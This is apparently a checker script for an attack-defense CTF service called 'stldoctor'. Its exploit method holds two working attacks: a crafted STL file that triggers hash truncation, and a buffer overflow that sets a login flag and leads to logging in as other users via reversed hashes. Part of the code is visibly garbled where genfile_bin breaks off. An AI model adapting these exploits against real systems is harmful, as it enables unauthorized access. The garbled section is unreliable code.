#!/usr/bin/env python3 from enochecker import BaseChecker, BrokenServiceException, EnoException, run from enochecker.utils import SimpleSocket import logging, math, os, random, re, socket, string, struct, subprocess, selectors, time import numpy as np from io import BytesIO from stl import mesh logging.getLogger("faker").setLevel(logging.WARNING) logging.getLogger("pwnlib").setLevel(logging.WARNING) logging.getLogger("_curses").setLevel(logging.CRITICAL) rand = random.SystemRandom() from faker import Faker evil_file = b""" solid test\xff facet normal 0 0 1.0 outer loop vertex 1 0 0 vertex 1 1 0 vertex 0 1 0 endloop endfacet endsolid test\xff """ generic_alphabet = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmopqrstuvwxyz0123456789-+.!" def ensure_bytes(v): if type(v) == bytes: return v elif type(v) == str: return v.encode() else: raise BrokenServiceException("Tried to pass non str/bytes to bytes arg") def includes_all(resp, targets): for m in targets: if ensure_bytes(m) not in resp: return False return True def includes_any(resp, targets): for m in targets: if ensure_bytes(m) in resp: return True return False def fakeid(): fake = Faker(["en_US"]) idstr = bytes([ord(c) for c in fake.name().replace(" ","") if c in generic_alphabet][:12]).ljust(10, b".") idstr += bytes([ord(rand.choice(generic_alphabet)) for i in range(8)]) return idstr def havocid(): idlen = rand.randint(10, 40) return bytes([rand.randint(32, 127) for i in range(idlen)]) def approx_equal(f1, f2, precision = 2): return round(f1, precision) == round(f2, precision) def reverse_hash(hashstr): if type(hashstr) is bytes: hashstr = hashstr.decode() data = subprocess.check_output([os.getenv("REVHASH_PATH"), hashstr])[:-1] if data == b"": raise BrokenServiceException(f"Failed to find hash preimage of {hashstr}") return data def check_line(conn, context): line = conn.recvline() if b"ERR:" in line: raise BrokenServiceException(f"{context}: Unexpected error message\n") return line def parse_int(intstr): try: return int(intstr) except: return None def parse_float(floatstr): try: return float(floatstr) except: return None def has_alph(data, alph): return len([v for v in data if v not in alph]) == 0 def assert_match(data, pattern, exception): rem = re.search(pattern, data) if rem is None: raise exception(f"Expected pattern {pattern} to match {data}") if len(rem.groups()) > 0: return rem.group(1) return rem.group(0) class STLDoctorChecker(BaseChecker): service_name = "stldoctor" port = 9090 flag_variants = 2 noise_variants = 2 havoc_variants = 16 exploit_variants = 2 prompt = b"\r$ " # HELPER FUNCS # def querydb(self, *args): vals = [] for arg in args: try: val: str = self.chain_db[arg] except KeyError as ex: raise BrokenServiceException(f"Invalid db contents, missing: {arg}") vals.append(val) return vals def postdb(self, **kwdict): self.chain_db = kwdict def genfile_ascii(self, solidname, malformed = None): indent = bytes([rand.choice(b"\t ") for i in range(rand.randint(1, 4))]) solidname = ensure_bytes(solidname) facet_count = rand.randint(4, 30) if len(solidname) != 0: content = b"solid " + solidname + b"\n" else: content = b"solid\n" for fi in range(facet_count): # MALFORM 1: wrong keyword if malformed == 1: content += indent * 1 + b"facet nornal " else: content += indent * 1 + b"facet normal " vs = [[rand.random() for i in range(3)] for k in range(3)] norm = np.cross(np.subtract(vs[1], vs[0]), np.subtract(vs[2],vs[0])) norm = norm / np.linalg.norm(norm) content += " ".join([f"{v:.2f}" for v in norm]).encode() + b"\n" # MALFORM 2: wrong keyword case if malformed == 2: content += indent * 2 + b"outer lOop\n" else: content += indent * 2 + b"outer loop\n" for i in range(3): content += indent * 3 + b"vertex " + " ".join([f"{v:.2f}" for v in vs[i]]).encode() + b"\n" content += indent * 2 + b"endloop\n" content += indent + b"endfacet\n" # MALFORM 3: no endsolid keyword if malformed != 3: if solidname != b"": content += b"endsolid " + solidname + b"\n" else: content += b"endsolid\n" return content def genfile_bin(self, solidname, malformed = None): solidname = ensure_bytes(solidname) facet_count = rand.randint(4, 30) if len(solidname) > 78: raise EnoException("Solidname to embed in header is larger than header itself") if solidname != "": content = b"#" + solidname.ljust(78, b"\x00") + b"\x00" else: content = b"#" + b"\x00" * 79 # MALFORM 1: specify more facets than are in the file if malformed == 1: content += struct.pack("> " not in resp: if check: raise BrokenServiceException(f"Failed to list private files:\n{resp}") return None return resp def do_upload(self, conn, modelname, stlfile, check = True): modelname = ensure_bytes(modelname) # Upload file self.debug(f"Uploading model with name {modelname}") conn.write("upload\n") conn.write(modelname + b"\n") conn.write(f"{len(stlfile)}\n") conn.write(stlfile) # Check for errors _ = conn.recvline() # Modelname: line = conn.recvline() if b"ERR:" in line: if check: raise BrokenServiceException(f"Failed to upload model {modelname}:\n{line}") conn.recvuntil(self.prompt) return None # Parse ID try: modelid = line.rsplit(b"!", 1)[0].split(b"with ID ", 1)[1] if modelid == b"": raise Exception except: raise BrokenServiceException(f"Invalid response during upload of {modelname}:\n{line}") conn.recvuntil(self.prompt) return modelid def do_search(self, conn, modelname, download = False, check = True): modelname = ensure_bytes(modelname) # Initiate download self.debug(f"Retrieving model with name {modelname}") conn.write(b"search " + modelname + b"\n") conn.write("0\n") # first result conn.write("y\n" if download else "n\n") conn.write("q\n") # quit # Check if an error occured line = conn.recvline() if b"ERR:" in line: if check: raise BrokenServiceException(f"Failed to retrieve model {modelname}:\n{line}") if b"Couldn't find a matching scan result" in line: # collect all the invalid commands sent after (hacky) conn.recvuntil(self.prompt) conn.recvuntil(self.prompt) conn.recvuntil(self.prompt) conn.recvuntil(self.prompt) return None # Recv until end of info box fileinfo = line + conn.recvuntil("================== \n") stlfile = b"" if download: # Parse file contents conn.recvuntil(b"Here you go.. (") resp = conn.recvuntil(b"B)\n")[:-3] size = parse_int(resp) if size is None: raise BrokenServiceException(f"Received invalid download size, response:\n{resp}") self.debug(f"Download size: {size}") stlfile = conn.recvn(size) conn.recvuntil(self.prompt) return fileinfo, stlfile # CHECK WRAPPERS # def check_listed(self, conn, includes): resp = self.do_list(conn, check = True) if not includes_all(resp, includes): raise BrokenServiceException(f"Failed to find {includes} in listing:\n{resp}") return resp def check_not_listed(self, conn, excludes, fail = False): resp = self.do_list(conn, check = False) if fail and resp: raise BrokenServiceException(f"Expected list to fail, but returned:\n{resp}") if not fail and not resp: raise BrokenServiceException(f"List failed unexpectedly:\n{resp}") if resp and includes_any(resp, excludes): raise BrokenServiceException(f"Unexpectedly found one of {excludes} in listing:\n{resp}") return resp def check_in_search(self, conn, modelname, includes, download = False): info, stlfile = self.do_search(conn, modelname, download, check = True) if not includes_all(info + stlfile, includes): raise BrokenServiceException(f"Retrieved info for {modelname} is missing {includes}: {resp}") return info, stlfile def check_not_in_search(self, conn, modelname, excludes, download = False, fail = False): resp = self.do_search(conn, modelname, download, check = False) if resp: combined = resp[0]+resp[1] if fail and resp: raise BrokenServiceException("Search for {modelname} succeeded unexpectedly:\n{combined}") if not fail and not resp: raise BrokenServiceException(f"Search for {modelname} failed unexpectedly:\n{resp}") if resp and includes_any(resp[0] + resp[1], excludes): raise BrokenServiceException(f"Unexpectedly {modelname} info contains one of {includes}: {combined}") return resp def check_hash(self, hashstr): if not has_alph(hashstr, b"0123456789abcdef"): raise BrokenServiceException("Hash is not a hexadecimal number") def check_stlinfo(self, resp, ref_info, ref_modelid = None, ref_modelname = None, ref_solidname = None): size = parse_int(assert_match(resp, b"File Size: (.*)\n", BrokenServiceException)) if not size or size != ref_info["size"]: raise BrokenServiceException(f"STL info returned no / invalid file size: {size} != {ref_info['size']}") triangle_count = parse_int(assert_match(resp, b"Triangle Count: (.*)\n", BrokenServiceException)) if not triangle_count or triangle_count != ref_info["triangle_count"]: raise BrokenServiceException(f"STL info returned no / invalid triangle count: {triangle_count} != {ref_info['triangle_count']}") bb_size_str = assert_match(resp, b"Bounding Box Size: (.*)\n", BrokenServiceException) bb_size = [parse_float(v) for v in bb_size_str.split(b" x ")] if None in bb_size: raise BrokenServiceException(f"STL info returned invalid bounding box size: {bb_size_str}") if False in [approx_equal(bb_size[i], ref_info["bb_size"][i]) for i in range(3)]: raise BrokenServiceException(f"Bounding box size doesnt match: (REF) {ref_info['bb_size']} {bb_size}") bb_origin_str = assert_match(resp, b"Bounding Box Origin: (.*)\n", BrokenServiceException) bb_origin = [parse_float(v) for v in bb_origin_str.split(b" x ")] if None in bb_origin: raise BrokenServiceException(f"STL info returned invalid bounding box origin: {bb_origin_str}") if False in [approx_equal(bb_origin[i], ref_info["bb_origin"][i]) for i in range(3)]: raise BrokenServiceException(f"Bounding box origin doesnt match: (REF) {ref_info['bb_origin']} {bb_origin}") triangle_count = parse_float(assert_match(resp, b"Triangle Count: (.*)\n", BrokenServiceException)) if triangle_count is None or triangle_count != ref_info["triangle_count"]: raise BrokenServiceException(f"Triangle count {triangle_count} doesnt match expected: {ref_info['triangle_count']}") if ref_modelname: modelname = assert_match(resp, b"Model Name: (.*)\n", BrokenServiceException) if modelname != ref_modelname: raise BrokenServiceException(f"Got modelname {modelname}, expected {ref_modelname}") if ref_modelid: modelid = assert_match(resp, b"Model ID: (.*)\n", BrokenServiceException) if modelid != ref_modelid: raise BrokenServiceException(f"Got modelid {modelid}, expected {ref_modelid}") if ref_solidname: solidname = assert_match(resp, b"Solid Name: (.*)\n", BrokenServiceException) if solidname != ref_solidname: raise BrokenServiceException(f"Got solidname {solidname}, expected {ref_solidname}") # TEST METHODS # def test_good_upload(self, filetype, register): # ASCII Solidname cant be havocid since it might mess with parsing solidname = fakeid() if filetype == "ascii" else havocid() modelname = havocid() authstr = havocid() stlfile = self.genfile(solidname, filetype) # Calculate properties to test response against ref_info = self.parse_stlinfo(stlfile) # Create new session and user and upload file conn = self.openconn() if register: self.do_auth(conn, authstr) modelid = self.do_upload(conn, modelname, stlfile) self.check_hash(modelid) expected = [modelname, solidname, stlfile, modelid] info, stlfile = self.check_in_search(conn, modelname, expected, download = True) self.check_stlinfo(info, ref_info, ref_modelname = modelname, ref_modelid = modelid, ref_solidname = solidname) if register: resp = self.check_listed(conn, [modelname, modelid + b"-"]) self.closeconn(conn) # Try getting file from a new session conn = self.openconn() if register: self.check_not_in_search(conn, modelname, expected, download = True, fail = True) self.do_auth(conn, authstr) info, stlfile = self.check_in_search(conn, modelname, expected, download = True) self.check_stlinfo(info, ref_info, ref_modelname = modelname, ref_modelid = modelid, ref_solidname = solidname) self.check_listed(conn, [modelname, modelid + b"-"]) else: info, stlfile = self.check_in_search(conn, modelname, expected, download = True) self.check_stlinfo(info, ref_info, ref_modelname = modelname, ref_modelid = modelid, ref_solidname = solidname) self.closeconn(conn) def test_bad_upload(self, filetype, variant): stlfile = self.genfile(fakeid(), filetype, malformed = variant) conn = self.openconn() if self.do_upload(conn, fakeid(), stlfile, check = False): raise BrokenServiceException(f"Able to upload malformed file:\n{stlfile}") self.closeconn(conn) def test_search(self, registered = False): solidname = fakeid() modelname = fakeid() modelname2 = fakeid() authstr = fakeid() stlfile = self.genfile(solidname, "bin") conn = self.openconn() if registered: self.do_auth(conn, authstr) modelid = self.do_upload(conn, modelname, stlfile) self.check_not_in_search(conn, modelname2, [modelname, modelid], download = True, fail = True) self.check_in_search(conn, modelname, [modelname, modelid], download = True) self.closeconn(conn) def test_list(self, registered = False): solidname = fakeid() modelname = fakeid() authstr = fakeid() authstr2 = fakeid() stlfile = self.genfile(solidname, "bin") conn = self.openconn() self.do_auth(conn, authstr) modelid = self.do_upload(conn, modelname, stlfile) self.check_listed(conn, [modelname, modelid + b"-"]) self.closeconn(conn) if registered: conn = self.openconn() if self.do_auth(conn, authstr2): raise BrokenServiceException("New authstr {authstr2} has user dir") self.check_not_listed(conn, [modelid, modelname]) self.closeconn(conn) else: conn = self.openconn() self.check_not_listed(conn, [modelid, modelname], fail = True) self.closeconn(conn) # CHECKER METHODS # def putflag(self): # type: () -> None if self.variant_id in (0, 1): modelname = fakeid() types = ["ascii", "bin"] registered = (self.variant_id == 1) stlfile = self.genfile(self.flag, types[self.variant_id]) authstr = fakeid() if registered else "" conn = self.openconn() if registered: self.do_auth(conn, authstr) modelid = self.do_upload(conn, modelname, stlfile) self.closeconn(conn) self.postdb(modelid = modelid, modelname = modelname, authstr = authstr) else: raise EnoException(f"Invalid putflag variant ({self.variant_id}) provided") def getflag(self): # type: () -> None if self.variant_id in (0, 1): modelid, modelname, authstr = self.querydb("modelid", "modelname", "authstr") registered = (self.variant_id == 1) conn = self.openconn() if registered: self.do_auth(conn, authstr) info, stlfile = self.do_search(conn, modelname, download = True) if self.flag.encode() not in info + stlfile: raise BrokenServiceException(f"Flag {self.flag} not found in search:\n{info}\n{stlfile}") self.closeconn(conn) else: raise EnoException(f"Invalid getflag variant ({self.variant_id}) provided") def putnoise(self): # type: () -> None if self.variant_id in (0, 1): modelname = fakeid() solidname = fakeid() types = ["bin", "ascii"] registered = (self.variant_id == 1) authstr = fakeid() if registered else "" stlfile = self.genfile(solidname, types[self.variant_id]) conn = self.openconn() if registered: self.do_auth(conn, authstr) modelid = self.do_upload(conn, modelname, stlfile) self.closeconn(conn) self.postdb(modelid = modelid, modelname = modelname, solidname = solidname, stlfile = stlfile, authstr = authstr) else: raise EnoException(f"Invalid putnoise variant ({self.variant_id}) provided") def getnoise(self): # type: () -> None if self.variant_id in (0, 1): modelid, modelname, solidname, stlfile, authstr \ = self.querydb("modelid", "modelname", "solidname", "stlfile", "authstr") registered = (self.variant_id == 1) expected = [modelname, solidname, stlfile, modelid] conn = self.openconn() if registered: self.do_auth(conn, authstr) self.check_in_search(conn, modelname, expected, download = True) self.closeconn(conn) else: raise EnoException(f"Invalid noise variant ({self.variant_id}) provided") def havoc(self): # type: () -> None if self.variant_id == 0: self.test_good_upload("ascii", False) elif self.variant_id == 1: self.test_good_upload("bin", False) elif self.variant_id == 2: self.test_good_upload("ascii", True) elif self.variant_id == 3: self.test_good_upload("bin", True) elif self.variant_id == 4: self.test_bad_upload("ascii", variant = 1) elif self.variant_id == 5: self.test_bad_upload("ascii", variant = 2) elif self.variant_id == 6: self.test_bad_upload("ascii", variant = 3) elif self.variant_id == 7: self.test_bad_upload("bin", variant = 1) elif self.variant_id == 8: self.test_bad_upload("bin", variant = 2) elif self.variant_id == 9: self.test_bad_upload("bin", variant = 3) elif self.variant_id == 10: self.test_bad_upload("garbage", variant = 1) elif self.variant_id == 11: self.test_bad_upload("garbage-tiny", variant = 1) elif self.variant_id == 12: self.test_search(False) elif self.variant_id == 13: self.test_search(True) elif self.variant_id == 14: self.test_list(False) elif self.variant_id == 15: self.test_list(True) else: raise EnoException(f"Invalid havoc variant ({self.variant_id}) provided") def exploit(self): # type: () -> None if self.variant_id == 0: modelname = fakeid() # Upload evil file for parse via search for hash truncation self.debug(f"Uploading evil file for hash truncation") conn = self.openconn() modelid = self.do_upload(conn, modelname, stlfile = evil_file) info, contents = self.do_search(conn, modelname, download = False) conn.write("search last\n") filelist = [l.strip().split(b" : ")[1] for l in conn.recvuntil("? ").split(b"\n") if b" : " in l] if len(filelist) == 0: raise BrokenServiceException("Failed to list files through search") # Use it to enumerate other files and grab contents found = None self.debug("Targets:\n" + "\n".join([" - " + l.decode("latin1") for l in filelist])) for i, fhash in enumerate(filelist): self.debug(f"Retrieving file {fhash} at index {i}") conn.write(f"{i}\nn\n") resp = conn.recvuntil("==================") resp += conn.recvuntil("? ") found = self.search_flag_bytes(resp) if found is not None or i == len(filelist) - 1: break # Done! conn.write("q\n") conn.recvuntil(self.prompt) self.closeconn(conn) if found is None: raise BrokenServiceException("Exploit for flagstore 1 failed") return found elif self.variant_id == 1: # Overflow loggedin variable conn = self.openconn() conn.write(b"search \xff\xff\xff\xff\xff0000000000000000\n") conn.recvuntil(self.prompt) conn.write("auth\n") if b"Already logged in!" not in conn.recvuntil(self.prompt): raise BrokenServiceException("Exploit did not set 'loggedin' variable via overflow") # Get private user hashes via 'list' resp = self.do_list(conn) self.debug("List response: " + str(resp)) users = [l.split(b" .")[1] for l in resp.split(b"\n") if b">> ." in l] if len(users) == 0: raise BrokenServiceException("Unable to list private user hashes") self.closeconn(conn) # Login as each private user found = None for u in users: # Find preimage of user hash self.debug(f"Logging in as user with id {u}") user = reverse_hash(u) # Authenticate and check if the user is new conn = self.openconn() if not self.do_auth(conn, user): self.closeconn(conn) # We dont raise an exception, because it could be that user dir was cleaned # up just before we logged in, not necessarily because of an invalid prehash. # If there was a problem with the preimage generation, we wont find a flag and # an exception will be raised later anways... continue # List all private files of user resp = self.do_list(conn) self.closeconn(conn) # Search for flag in solid names names = b"\n".join([l.split(b": ", 1)[1] for l in resp.split(b"\n") if b"Solid Name: " in l]) found = self.search_flag_bytes(names) if found is not None: break if found is None: raise BrokenServiceException("Exploit for flagstore 2 failed") return found else: raise EnoException(f"Invalid exploit variant ({self.variant_id}) provided") app = STLDoctorChecker.service # This can be used for uswgi. if __name__ == "__main__": run(STLDoctorChecker)